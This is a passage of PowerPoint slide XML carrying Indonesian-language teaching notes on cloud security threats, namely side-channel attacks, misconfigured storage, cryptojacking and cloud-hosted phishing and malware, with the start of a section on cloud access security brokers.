              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saluran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>samping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> instance yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> korban </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengekstrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> instance korban </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lemah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di ember </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cryptojacking, di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> uang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kripto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persetujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengarah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (sangat) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menurunkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibahas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Topik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 6A dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> phishing dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>distribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meniru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelabui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> agar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengungkapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> meng-host file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file-file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email phishing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pialang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Akses Cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Broker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (CASB) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
